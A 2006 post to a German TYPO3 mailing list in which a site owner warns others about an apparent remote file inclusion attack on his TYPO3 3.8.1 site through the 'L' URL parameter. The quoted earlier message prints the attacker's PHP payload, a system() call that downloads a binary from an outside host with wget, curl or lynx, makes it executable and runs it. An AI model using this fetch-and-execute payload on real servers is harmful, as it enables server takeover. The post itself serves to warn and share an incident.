[TYPO3-german] Warnung !!! - Komische Anfrage an mein Typo3
Christian Leicht
usenet at schani.com
Sat Sep 2 13:32:52 CEST 2006
Sorry das ich am Samstag Mittag so schreie. Ich muss auch einen neuen
Tread aufmachen, sonst wird es übersehen.
Aber ich habe gerade folgendes festgestellt:
Die Tage hatte ich über einen Angriffs "Versuch" auf meiner 3.8.1
Installation berichtet und habe dann im .htacces Files den Zugriff für
die URI "abuser.republika.pl" gesperrt. Anscheinend war das zu spät.
Gerade habe ich bemerkt das beim aufrufen meiner Domain und nach
anklicken einiger Links - automatisch an die L Variable
"index.php?id=34&L=http://abuser.republika.pl/test" angehängt wird.
Ich mache mich gleich auf die Suche und versuche raus zu bekommen, wo
sich da was festgesetzt hat.
Die betroffene Domain http://www.leicht.info
Ich habe es auf verschiedenen Rechnern/Browsern nachvollzogen.
Bitte kontrolliert auch bei Euch
Danke
Christian
Christian Leicht schrieb:
> Hallo
>
> ich habe gerade meine Logfiles einer T3 installation durchgeschaut
und folgenes gefunden:
>
> index.php?id=34&L=http://abuser.republika.pl/test
>
> Versucht da jemand meine Seite zu knacken? Wenn ich dem Link nachgehe
kommt dieses php Script zum Vorschein:
>
> <?
>
> echo 'm4k4bra - mamy cie';
>
> system('cd /var/tmp;wget http://abuser.republika.pl/kt2; if [ ! -e
./kt2 ]; then curl http://abuser.republika.pl/kt2 > kt2;fi;if [ ! -e
./kt2 ];then lynx -dump http://abuser.republika.pl/kt2 >kt2; fi; chmod
777 kt2; ./kt2&');
>
> ?>
>
> Christian
More information about the TYPO3-german
mailing list